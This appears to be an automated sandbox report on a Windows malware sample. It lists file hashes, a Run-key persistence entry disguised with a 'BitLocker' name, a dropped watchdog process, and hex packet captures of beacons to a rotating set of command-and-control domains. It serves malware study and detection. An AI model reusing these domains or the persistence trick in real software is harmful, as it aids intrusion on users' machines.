Analysis Date: 2014-09-19 05:03:11

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 7ce1d22833c534414c47f628f3acb3c3 sha1: f9cd8d98875f2b3a498dc3c5a7acccc6539d12cc size: 298496
Section .rdata md5: ef1b136dfed5910502b49af46d9a244a sha1: b7e44959572300172b11c871280845c79732eba2 size: 34816
Section (name not recorded) md5: c0da35e1a6559ecec0cc9b3a91811418 sha1: eb25fb1d572bdacebdc3880467c8d0693bf96fee size: 95744
Timestamp: 2014-07-24 05:34:13
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\BitLocker File Machine Play Event Color Protocol ➝ C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe

↳ C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.rp
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bsusjauh.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe"

Network Details:
DNS: 85 queries, all Type: A (queried names not present in this extract)
Flows TCP 192.168.1.1:1031 ➝
Flows TCP 192.168.1.1:1032 ➝
Flows TCP 192.168.1.1:1033 ➝
Flows TCP 192.168.1.1:1034 ➝
Flows TCP 192.168.1.1:1035 ➝
Flows TCP 192.168.1.1:1036 ➝
Flows TCP 192.168.1.1:1037 ➝
Flows TCP 192.168.1.1:1038 ➝
Flows TCP 192.168.1.1:1039 ➝
Flows TCP 192.168.1.1:1040 ➝
Flows TCP 192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7468696e 6b626579 6f6e642e 6e65740d   thinkbeyond.net.
0x00000070 (00112)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   70726573 656e7462 65696e67 2e6e6574   presentbeing.net
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   63686965 66626569 6e672e6e 65740d0a   chiefbeing.net..
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7477656c 7665666f 72657665 722e6e65   twelveforever.ne
0x00000070 (00112)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   68697374 6f727966 6f726576 65722e6e   historyforever.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   77656174 68657266 6f726576 65722e6e   weatherforever.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   636c6173 73626579 6f6e642e 6e65740d   classbeyond.net.
0x00000070 (00112)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7468696e 6b666c6f 7765722e 6e65740d   thinkflower.net.
0x00000070 (00112)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   70726573 656e7466 6c6f7765 722e6e65   presentflower.ne
0x00000070 (00112)   740d0a0d 0a0a                         t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   636f6c6c 65676563 6f726e65 722e6e65   collegecorner.ne
0x00000070 (00112)   740d0a0d 0a0a                         t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   6f667465 6e666c6f 7765722e 6e65740d   oftenflower.net.
0x00000070 (00112)   0a0d0a0d 0a0a                         ......

Strings:

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
vbeala fdoidar ccbupnfook iceag ozfgioe mdf ngxohigr cclumysas ayeyjihu juku snnucei nbop glfec ndcudl imtn bfti lkl dqmiztm kjejubmq sgbenj hinlui oexv fhlo besbudbg dykob faidkuk dyvoyg rsrae rizvog jepqu bhjol bffizdg ouulnnuml entpelbis sdoxodrs zyyara allcu hjicagior zsdugpru arpdaqfjo zpvej ghbefmod mtjemecdi gijgimbm bslufusdol ysadumssa azncu ggtuj gdpamjv pjdu xviui lswajo ivvcocbq gigikooj pfpaerunbi dzb mpeje pbsua uobtzopcqa esmlu ndc ubb bsh quais jppeawgug roabvaf vft mfgavlbo opgr gvkex ahbzejdtus aqnfubfweb krlolkkab plye glic cflin pdlossbu lgj wbpeifpume bndu ccvauxwe manpokpwu wocn eicirn brvie lebsiwam lmjebmmuq yhy nbgooam fsl fii ctyev ofo gmzi nmbogocje qgcio tzzumgobem uhu cspojl mgjipggujr getbesbmoa bits iodsu cacc tjicufy erndirfge jxtu jgcidfcio azoitdedlp itqlu llcoffeceb sfkoicl famasovby gqimoedod cxmat jpocixloga fbbinlgiom pejs gdjatoiof tpobon braeagu bfbapcniu ldz unmc lzugulpbiy pbuzeddced mopg oakttihjag peopfu ojjl mugge bbyiufmne zszeayz zsmuim ifsp zmg rdigupv sckac kssoblc jjkoew fpc sskoa qffilksolq jliadajaoy ccuga zbmovtfep tpupombegu bbajieeb rczuguxtin loe snbiofso epullai vdfaiw mudtuefts sfuneizyeg wjnewzg vni yggisna pcuo jscec slho
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
vo<W	7
